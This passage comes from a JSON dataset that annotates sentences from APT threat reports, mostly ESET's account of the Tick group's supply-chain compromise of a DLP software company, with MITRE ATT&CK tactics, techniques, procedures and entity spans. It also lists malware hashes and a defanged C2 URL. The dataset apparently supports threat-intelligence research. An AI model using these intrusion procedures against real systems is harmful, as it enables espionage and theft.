VBS\n2a3da413f9f0554148469ea715f2776ab40e86925fb68cc6279ffc00f4f410dd SFX\n10/11", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-05_aptnotes_report-p11-s59-fd3a8d", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 11, "sentence_id": 59, "context_before": "SHA256SHA256 DescriptioDescriptio\nd21aa84542303ca70b59b53e9de9f092f9001f409158a9d46a5e8ce82ab60fb6 SFX\n0eec5a7373b28a991831d9be1e30976ceb057e5b701e732372524f1a50255c7 LNK\n8aca535047a3a38a57f80a64d9282ace7a33c54336cd08662409352c23507602 VBS\n2c2fa6b9fbb6aa270ba0f49ebb361ebf7d36258e1bdfd825bc2faeb738c487ed Decoy\n659abb39eec218de66e2c1d917b22149ead7b743d3fe968ef840ef22318060fd SFX\n0aa794e54c19dbcd5425405e3678ab9bc98fb7ea787684afb962ee22a1c0ab51 LNK\n4e8de351db362c519504509df309c7b58b891baf9cb99a3500b92fe0ef772924 VBS\n53812d7bdaf5e8e5c1b99b4b9f3d8d3d7726d4c6c23a72fb109132d96ca725c2 Decoy\n38b49818bb95108187fb4376e9537084062207f91310cdafcb9e4b7aa0d078f9 HTA\na10209c10bf373ed682a13dad4ff3aea95f0fdcd48b62168c6441a1c9f06be37 VBS\n61a5b971a6b5f9c2b5e9a860c996569da30369ac67108d4b8a71f58311a6e1f1 Decoy\n86549cf9c343d0533ef80be2f080a7e3c38c77a1dfbde0a2f89048127979ec2a SFX\n762c7289fb016bbcf976bd104bd8da72e17d6d81121a846cd40480dbdd876378 LNK\n39d56eab8adfe9eb244914dde42ec7f12f48836d3ba56c479ab21bdbc41025fe VBS\nf75f1d4c561fcb013e262b3667982759f215ba7e714c43474755b72ed7f9d01e Decoy\n986694cad425c8f566e4e12c104811d4e8b30ce6c4c4d38f919b617b1aa66b05 CVE-2023\n38831 ZIP\n54458ebfbe56bc932e75d6d0a5c1222286218a8ef26face40f2a0c0ec2517584 CVE\nPayload\n96ab977f8763762af26bad2b6c501185b25916775b4ed2d18ad66b4c38bd5f0d VBS\n6a638569f831990df48669ca81fec37c6da380dbaaa6432d4407985e809810da Decoy\n87291b918218e01cac58ea55472d809d8cdd79266c372aebe9ee593c0f4e3b77 CVE-2023\n38831 ZIP\nf5f269cf469bf9c9703fe0903cda100acbb4b3e13dbfef6b6ee87a907e5fcd1b CVE\nPayload\ne34fc4910458e9378ea357baf045e9c0c21515a0b8818a5b36daceb2af464ea0 VBS\n2a3da413f9f0554148469ea715f2776ab40e86925fb68cc6279ffc00f4f410dd SFX\n10/11", "sentence_text": "SHA256 Descriptio\n0acd4a9ef18f3fd1ccf440879e768089d4dd2107e1ce19d2a17a59ebed8c7f5d LNK\n6f5f265110490158df91ca8ad429a96f8af69ca30b9e3b0d9c11d4fef74091e8 VBS\n736c0128402d83cd3694a5f5bb02072d77385c587311274e3229e9b2fd5c5af7 Decoy\n11/11", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p1-s1-39172e", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "The slow Tick‑ing time bomb: Tick APT group compromise of a DLP software developer in East Asia welivesecurity.com/2023/03/14/slow-ticking-time-bomb-tick-apt-group-dlp-software-developer-east-asia March 14, 2023 ESET Research uncovered a campaign by APT group Tick against a data-loss prevention company in East Asia and found a previously unreported tool used by the group Facundo Muñoz 14 Mar 2023 - 11:30AM ESET researchers discovered a campaign that we attribute with high confidence to the APT group Tick.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p1-s2-e8b685", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 1, "sentence_id": 2, "context_before": "The slow Tick‑ing time bomb: Tick APT group compromise of a DLP software developer in East Asia welivesecurity.com/2023/03/14/slow-ticking-time-bomb-tick-apt-group-dlp-software-developer-east-asia March 14, 2023 ESET Research uncovered a campaign by APT group Tick against a data-loss prevention company in East Asia and found a previously unreported tool used by the group Facundo Muñoz 14 Mar 2023 - 11:30AM ESET researchers discovered a campaign that we attribute with high confidence to the APT group Tick.", "sentence_text": "The incident took place in the network of an East Asian company that develops data-loss prevention (DLP) software.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p1-s3-a67dac", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 1, "sentence_id": 3, "context_before": "The incident took place in the network of an East Asian company that develops data-loss prevention (DLP) software.", "sentence_text": "The attackers compromised the DLP company’s internal update servers to deliver malware inside the software developer’s network, and trojanized installers of legitimate tools used by the company, which eventually resulted in the execution of malware on the computers of the company’s customers.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1195", "name": "Supply Chain Compromise" }, { "id": "T1204", "name": "User Execution" } ], "procedure": "Compromise internal update servers to deliver malware and trojanize legitimate software installers, leading to malware execution on customer systems.", "entities": [ { "text": "attackers compromised the DLP company’s internal update servers", "start": 4, "end": 67, "label": "Action" }, { "text": "deliver malware", "start": 71, "end": 86, "label": "Action" }, { "text": "trojanized installers", "start": 132, "end": 153, "label": "Action" }, { "text": "installers", "start": 143, "end": 153, "label": "MalwareTool" }, { "text": "execution of malware", "start": 228, "end": 248, "label": "Action" } ] }, { "uid": "aptnotes-06_aptnotes_report-p1-s4-df6213", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 1, "sentence_id": 4, "context_before": "The attackers compromised the DLP company’s internal update servers to deliver malware inside the software developer’s network, and trojanized installers of legitimate tools used by the company, which eventually resulted in the execution of malware on the computers of the company’s customers.", "sentence_text": "In this blogpost, we provide technical details about the malware detected in the networks of the compromised company and of its customers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p1-s5-480ebc", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 1, "sentence_id": 5, "context_before": "In this blogpost, we provide technical details about the malware detected in the networks of the compromised company and of its customers.", "sentence_text": "During the intrusion, the attackers deployed a previously undocumented downloader named ShadowPy, and they also deployed the Netboy backdoor (aka Invader) and Ghostdown downloader.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Deploy ShadowPy downloader, Netboy backdoor, and Ghostdown downloader during the intrusion.", "entities": [ { "text": "the attackers", "start": 22, "end": 35, "label": "ThreatActor" }, { "text": "deployed a previously undocumented downloader", "start": 36, "end": 81, "label": "Action" }, { "text": "ShadowPy", "start": 88, "end": 96, "label": "MalwareTool" }, { "text": "deployed the Netboy backdoor", "start": 112, "end": 140, "label": "Action" }, { "text": "Netboy", "start": 125, "end": 131, "label": "MalwareTool" }, { "text": "Invader", "start": 146, "end": 153, "label": "MalwareTool" }, { "text": "deployed the Netboy backdoor (aka Invader) and Ghostdown downloader", "start": 112, "end": 179, "label": "Action" }, { "text": "Ghostdown", "start": 159, "end": 168, "label": "MalwareTool" } ] }, { "uid": "aptnotes-06_aptnotes_report-p1-s6-b3fb48", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 1, "sentence_id": 6, "context_before": "During the intrusion, the attackers deployed a previously undocumented downloader named ShadowPy, and they also deployed the Netboy backdoor (aka Invader) and Ghostdown downloader.", "sentence_text": "Based on Tick’s profile, and the compromised company’s high-value customer portfolio, the objective of the attack was most likely cyberespionage.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p1-s7-d9c38c", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 1, "sentence_id": 7, "context_before": "Based on Tick’s profile, and the compromised company’s high-value customer portfolio, the objective of the attack was most likely cyberespionage.", "sentence_text": "How the data-loss prevention company was initially compromised is unknown.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p1-s8-05a58e", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 1, "sentence_id": 8, "context_before": "How the data-loss prevention company was initially compromised is unknown.", "sentence_text": "Key points in this blogpost:\nESET researchers uncovered an attack occurring in the network of an East Asian data-loss prevention company with a customer portfolio that includes government and military entities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p1-s9-4ee9d1", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 1, "sentence_id": 9, "context_before": "Key points in this blogpost:\nESET researchers uncovered an attack occurring in the network of an East Asian data-loss prevention company with a customer portfolio that includes government and military entities.", "sentence_text": "ESET researchers attribute this attack with high confidence to the Tick APT group.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p1-s10-f09dd9", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 1, "sentence_id": 10, "context_before": "ESET researchers attribute this attack with high confidence to the Tick APT group.", "sentence_text": "The attackers deployed at least three malware families and compromised update servers and tools used by the company.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1195", "name": "Supply Chain Compromise" } ], "procedure": "Deploy multiple malware families and compromise company update servers and tools.", "entities": [ { "text": "The attackers", "start": 0, "end": 13, "label": "ThreatActor" }, { "text": "deployed at least three malware families", "start": 14, "end": 54, "label": "Action" }, { "text": "compromised update servers and tools used by the company", "start": 59, "end": 115, "label": "Action" }, { "text": "update servers", "start": 71, "end": 85, "label": "Infrastructure_Indicator" }, { "text": "tools used by the company", "start": 90, "end": 115, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-06_aptnotes_report-p1-s11-708e4f", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 1, "sentence_id": 11, "context_before": "The attackers deployed at least three malware families and compromised update servers and tools used by the company.", "sentence_text": "As a result, two of their customers were compromised.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p1-s12-6e059d", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 1, "sentence_id": 12, "context_before": "As a result, two of their customers were compromised.", "sentence_text": "The investigation revealed a previously undocumented downloader named ShadowPy.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p1-s13-a9751d", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 1, "sentence_id": 13, "context_before": "The investigation revealed a previously undocumented downloader named ShadowPy.", "sentence_text": "This group is of interest for its cyberespionage operations, which focus on stealing classified information and intellectual property.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p1-s14-a9e6c6", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 1, "sentence_id": 14, "context_before": "This group is of interest for its cyberespionage operations, which focus on stealing classified information and intellectual property.", "sentence_text": "Tick employs an exclusive custom malware toolset designed for persistent access to compromised machines, reconnaissance, data exfiltration, and download of tools.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p1-s15-6ac95a", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 1, "sentence_id": 15, "context_before": "Tick employs an exclusive custom malware toolset designed for persistent access to compromised machines, reconnaissance, data exfiltration, and download of tools.", "sentence_text": "Our latest report into Tick’s activity found it exploiting the ProxyLogon vulnerability to compromise a South Korean IT company, as one of the groups with access to that remote code execution exploit before the vulnerability was publicly disclosed.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Exploit the ProxyLogon vulnerability to compromise a target organization.", "entities": [ { "text": "Tick", "start": 23, "end": 27, "label": "ThreatActor" }, { "text": "exploiting the ProxyLogon vulnerability", "start": 48, "end": 87, "label": "Action" }, { "text": "ProxyLogon", "start": 63, "end": 73, "label": "Infrastructure_Indicator" }, { "text": "compromise a South Korean IT company", "start": 91, "end": 127, "label": "Action" } ] }, { "uid": "aptnotes-06_aptnotes_report-p1-s16-a9a63d", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 1, "sentence_id": 16, "context_before": "Our latest report into Tick’s activity found it exploiting the ProxyLogon vulnerability to compromise a South Korean IT company, as one of the groups with access to that remote code execution exploit before the vulnerability was publicly disclosed.", "sentence_text": "While still a zero-day, the group used the exploit to install a webshell to deploy a backdoor on a webserver.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0003", "name": "Persistence" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" }, { "id": "T1505", "name": "Server Software Component" }, { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Use a zero-day exploit to install a webshell and deploy a backdoor on a webserver.", "entities": [ { "text": "used the exploit", "start": 34, "end": 50, "label": "Action" }, { "text": "install a webshell", "start": 54, "end": 72, "label": "Action" }, { "text": "webshell", "start": 64, "end": 72, "label": "MalwareTool" }, { "text": "deploy a backdoor", "start": 76, "end": 93, "label": "Action" }, { "text": "backdoor", "start": 85, "end": 93, "label": "MalwareTool" }, { "text": "webserver", "start": 99, "end": 108, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-06_aptnotes_report-p1-s17-bfa0c3", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 1, "sentence_id": 17, "context_before": "While still a zero-day, the group used the exploit to install a webshell to deploy a backdoor on a webserver.", "sentence_text": "The attackers deployed persistent malware and replaced installers of a legitimate application known as Q-dir with trojanized copies that, when executed, dropped an open-source VBScript backdoor named ReVBShell, as well as a copy of the legitimate Q-Dir application.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0003", "name": "Persistence" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1195", "name": "Supply Chain Compromise" }, { "id": "T1105", "name": "Ingress Tool Transfer" }, { "id": "T1059.005", "name": "Visual Basic" } ], "procedure": "Deploy persistent malware, replace legitimate application installers with trojanized versions, and drop a VBScript backdoor upon execution.", "entities": [ { "text": "deployed persistent malware", "start": 14, "end": 41, "label": "Action" }, { "text": "persistent malware", "start": 23, "end": 41, "label": "MalwareTool" }, { "text": "replaced installers of a legitimate application", "start": 46, "end": 93, "label": "Action" }, { "text": "Q-dir", "start": 103, "end": 108, "label": "Infrastructure_Indicator" }, { "text": "trojanized copies", "start": 114, "end": 131, "label": "MalwareTool" }, { "text": "dropped an open-source VBScript backdoor", "start": 153, "end": 193, "label": "Action" }, { "text": "ReVBShell", "start": 200, "end": 209, "label": "MalwareTool" } ] }, { "uid": "aptnotes-06_aptnotes_report-p1-s18-7b3923", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 1, "sentence_id": 18, "context_before": "The attackers deployed persistent malware and replaced installers of a legitimate application known as Q-dir with trojanized copies...", "sentence_text": "This led to the execution of malicious code in networks of two of the compromised company’s customers when the trojanized installers were transferred via remote support software.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": null, "procedure": "Malicious code is executed on customer systems after trojanized installers are transferred.", "entities": [ { "text": "execution of malicious code", "start": 16, "end": 43, "label": "Action" } ] }, { "uid": "aptnotes-06_aptnotes_report-p1-s19-08fd5d", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 1, "sentence_id": 19, "context_before": "This led to the execution of malicious code in networks of two of the compromised company’s customers when the trojanized installers were transferred via remote support software – our hypothesis is that this occurred while the DLP company provided technical support to their customers.", "sentence_text": "The attackers also compromised update servers, which delivered malicious updates on two occasions to machines inside the network of the DLP company.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1195", "name": "Supply Chain Compromise" } ], "procedure": "Compromise update servers to deliver malicious updates to internal machines.", "entities": [ { "text": "compromised update servers", "start": 19, "end": 45, "label": "Action" }, { "text": "update servers", "start": 31, "end": 45, "label": "Infrastructure_Indicator" }, { "text": "delivered malicious updates", "start": 53, "end": 80, "label": "Action" }, { "text": "malicious updates", "start": 63, "end": 80, "label": "MalwareTool" } ] }, { "uid": "aptnotes-06_aptnotes_report-p1-s20-81d735", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 1, "sentence_id": 20, "context_before": "The attackers also compromised update servers, which delivered malicious updates on two occasions to machines inside the network of the DLP company.", "sentence_text": "Using ESET telemetry, we didn’t detect any other cases of malicious updates outside the DLP company’s network.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p1-s21-0d9417", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 1, "sentence_id": 21, "context_before": "Using ESET telemetry, we didn’t detect any other cases of malicious updates outside the DLP company’s network.", "sentence_text": "The customer portfolio of the DLP company includes government and military entities, making the compromised company an especially attractive target for an APT group such as Tick.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p1-s23-64678e", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 1, "sentence_id": 23, "context_before": "Timeline", "sentence_text": "According to ESET telemetry, in March 2021 the attackers deployed malware to several machines of the software developer company.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Deploy malware to multiple machines within the targeted organization.", "entities": [ { "text": "deployed malware", "start": 57, "end": 73, "label": "Action" }, { "text": "malware", "start": 66, "end": 73, "label": "MalwareTool" } ] }, { "uid": "aptnotes-06_aptnotes_report-p1-s24-0b43b4", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 1, "sentence_id": 24, "context_before": "According to ESET telemetry, in March 2021 the attackers deployed malware to several machines of the software developer company.", "sentence_text": "The malware included variants of the Netboy and Ghostdown families, and a previously undocumented downloader named ShadowPy.\n1/11", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p2-s25-def22e", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 2, "sentence_id": 25, "context_before": "The malware included variants of the Netboy and Ghostdown families, and a previously undocumented downloader named ShadowPy.\n1/11", "sentence_text": "In April, the attackers began to introduce trojanized copies of the Q-dir installers in the network of the compromised company.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1195", "name": "Supply Chain Compromise" } ], "procedure": "Introduce trojanized installer copies within the compromised network to facilitate further compromise.", "entities": [ { "text": "introduce trojanized copies", "start": 33, "end": 60, "label": "Action" }, { "text": "trojanized copies", "start": 43, "end": 60, "label": "MalwareTool" }, { "text": "Q-dir installers", "start": 68, "end": 84, "label": "MalwareTool" } ] }, { "uid": "aptnotes-06_aptnotes_report-p2-s26-38f8cc", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 2, "sentence_id": 26, "context_before": "In April, the attackers began to introduce trojanized copies of the Q-dir installers in the network of the compromised company.", "sentence_text": "In June and September 2021, in the network of the compromised company, the component that performs updates for the software developed by the compromised company downloaded a package that contained a malicious executable.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1195", "name": "Supply Chain Compromise" } ], "procedure": "Download a package containing a malicious executable through the software update component.", "entities": [ { "text": "downloaded a package that contained a malicious executable", "start": 161, "end": 219, "label": "Action" }, { "text": "malicious executable", "start": 199, "end": 219, "label": "MalwareTool" } ] }, { "uid": "aptnotes-06_aptnotes_report-p2-s27-699fcd", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 2, "sentence_id": 27, "context_before": "In June and September 2021, in the network of the compromised company, the component that performs updates for the software developed by the compromised company downloaded a package that contained a malicious executable.", "sentence_text": "In February and June 2022, the trojanized Q-dir installers were transferred via remote support tools to customers of the compromised company.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p2-s28-c4ccb6", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 2, "sentence_id": 28, "context_before": "In February and June 2022, the trojanized Q-dir installers were transferred via remote support tools to customers of the compromised company.", "sentence_text": "Compromised update servers The first incident where an update containing malware was registered was in June, and then again in September, 2021.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p2-s29-b76551", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 2, "sentence_id": 29, "context_before": "Compromised update servers The first incident where an update containing malware was registered was in June, and then again in September, 2021.", "sentence_text": "On both cases the update was delivered to machines inside the DLP company’s network.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p2-s30-22ce11", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 2, "sentence_id": 30, "context_before": "On both cases the update was delivered to machines inside the DLP company’s network.", "sentence_text": "The update came in the form of a ZIP archive that contained a malicious executable file.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p2-s31-4cf1c3", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 2, "sentence_id": 31, "context_before": "The update came in the form of a ZIP archive that contained a malicious executable file.", "sentence_text": "It was deployed and executed by a legitimate update agent from software developed by the compromised company.", "relevant": "yes", "tactic": [ { "name": "Execution", "id": "TA0002" } ], "techniques": null, "procedure": "The malicious file is deployed and executed by a legitimate update agent.", "entities": [ { "text": "was deployed", "start": 3, "end": 15, "label": "Action" }, { "text": "executed", "start": 20, "end": 28, "label": "Action" } ] }, { "uid": "aptnotes-06_aptnotes_report-p3-s32-1dfeb6", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 3, "sentence_id": 32, "context_before": "It was deployed and executed by a legitimate update agent from software developed by the compromised company.", "sentence_text": "The first detected case occurred in June 2021, and the update was downloaded from an internal server and deployed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p3-s33-ad4db6", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 3, "sentence_id": 33, "context_before": "The first detected case occurred in June 2021, and the update was downloaded from an internal server and deployed.", "sentence_text": "The second case occurred in September 2021, from a public-facing server.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p3-s34-565131", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 3, "sentence_id": 34, "context_before": "The second case occurred in September 2021, from a public-facing server.", "sentence_text": "The malicious executable issues an HTTP GET request to http://103.127.124[.]117/index.html to obtain the key to decrypt the embedded payload, which is encrypted with the RC6 algorithm.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Send HTTP request to retrieve decryption key for payload execution.", "entities": [ { "text": "issues an HTTP GET request", "start": 25, "end": 51, "label": "Action" }, { "text": "http://103.127.124[.]117/index.html", "start": 55, "end": 90, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-06_aptnotes_report-p3-s35-1981c5", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 3, "sentence_id": 35, "context_before": "The malicious executable issues an HTTP GET request to http://103.127.124[.]117/index.html to obtain the key to decrypt the embedded payload, which is encrypted with the RC6 algorithm.", "sentence_text": "The payload is dropped to the %TEMP% directory with a random name and a .vbe extension, and is then executed.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.005", "name": "Command and Scripting Interpreter: Visual Basic" } ], "procedure": "Drop payload into the %TEMP% directory with a random .vbe filename and execute it.", "entities": [ { "text": "the %TEMP% directory", "start": 26, "end": 46, "label": "Infrastructure_Indicator" }, { "text": "dropped to the %TEMP% directory with a random name and a .vbe extension", "start": 15, "end": 86, "label": "Action" }, { "text": "is then executed", "start": 92, "end": 108, "label": "Action" }, { "text": ".vbe", "start": 72, "end": 76, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-06_aptnotes_report-p3-s36-ff6a1d", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 3, "sentence_id": 36, "context_before": "The payload is dropped to the %TEMP% directory with a random name and a .vbe extension, and is then executed.", "sentence_text": "Although we have not obtained the dropped sample from the compromised machine, based on the detection (VBS/Agent.DL), we have high confidence that the detected script was the open-source backdoor ReVBShell.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p3-s37-40c551", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 3, "sentence_id": 37, "context_before": "Although we have not obtained the dropped sample from the compromised machine, based on the detection (VBS/Agent.DL), we have high confidence that the detected script was the open-source backdoor ReVBShell.", "sentence_text": "Using ESET telemetry, we didn’t identify any customers of the DLP company who had received any malicious files through the software developed by that company.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p3-s38-cdbcaf", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 3, "sentence_id": 38, "context_before": "Using ESET telemetry, we didn’t identify any customers of the DLP company who had received any malicious files through the software developed by that company.", "sentence_text": "Our hypothesis is that the attackers compromised the update servers to move laterally on the network, not to perform a supply-chain attack against external customers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p3-s39-cb6313", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 3, "sentence_id": 39, "context_before": "Our hypothesis is that the attackers compromised the update servers to move laterally on the network, not to perform a supply-chain attack against external customers.", "sentence_text": "Trojanized Q-Dir installers Q-Dir is a legitimate application developed by SoftwareOK that allows its user to navigate four folders at the same time within the same window, as shown in Figure 3.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p3-s40-ab7307", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 3, "sentence_id": 40, "context_before": "Trojanized Q-Dir installers Q-Dir is a legitimate application developed by SoftwareOK that allows its user to navigate four folders at the same time within the same window, as shown in Figure 3.", "sentence_text": "We believe that the legitimate application is part of a toolkit used by employees of the compromised company, based on where the detections originated inside the network.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p4-s42-bb4ef6", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 4, "sentence_id": 42, "context_before": "3/11", "sentence_text": "According to ESET telemetry, starting in April 2021, two months before the detection of the malicious updates, the attackers began to introduce 32- and 64-bit trojanized installers of the application into the compromised company’s network.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1195", "name": "Supply Chain Compromise" } ], "procedure": "Introduce trojanized 32- and 64-bit application installers into the compromised company’s network.", "entities": [ { "text": "the attackers", "start": 111, "end": 124, "label": "ThreatActor" }, { "text": "introduce 32- and 64-bit trojanized installers of the application into the compromised company’s network", "start": 134, "end": 238, "label": "Action" }, { "text": "32- and 64-bit trojanized installers of the application", "start": 144, "end": 199, "label": "MalwareTool" }, { "text": "the compromised company’s network", "start": 205, "end": 238, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-06_aptnotes_report-p4-s43-5a3a3b", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 4, "sentence_id": 43, "context_before": "According to ESET telemetry, starting in April 2021, two months before the detection of the malicious updates, the attackers began to introduce 32- and 64-bit trojanized installers of the application into the compromised company’s network.", "sentence_text": "These computers had software from the compromised company installed on them, and the trojanized Q-dir installer was received minutes after the support software was installed by the users.", "relevant": "yes", "tactic": [ { "name": "Initial Access", "id": "TA0001" } ], "techniques": null, "procedure": "The trojanized installer is delivered to systems after the installation of support software.", "entities": [ { "text": "was received", "start": 112, "end": 124, "label": "Action" }, { "text": "was installed", "start": 160, "end": 173, "label": "Action" } ] }, { "uid": "aptnotes-06_aptnotes_report-p4-s44-527e23", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 4, "sentence_id": 44, "context_before": "These computers had software from the compromised company installed on them, and the trojanized Q-dir installer was received minutes after the support software was installed by the users.", "sentence_text": "Our hypothesis is that the customers of the compromised DLP company were receiving technical support from that company, via one of those remote support applications and the malicious installer was used unknowingly to service the customers of the DLP company; it is unlikely that the attackers installed support tools to transfer the trojanized installers themselves.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p4-s45-895e1b", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 4, "sentence_id": 45, "context_before": "Our hypothesis is that the customers of the compromised DLP company were receiving technical support from that company, via one of those remote support applications and the malicious installer was used unknowingly to service the customers of the DLP company; it is unlikely that the attackers installed support tools to transfer the trojanized installers themselves.", "sentence_text": "The entry point code of the application is patched with a JMP instruction that points to the shellcode, and is located right after the call to WinMain (Figure 4); therefore the malicious code is only executed after the application’s legitimate code finishes its execution.", 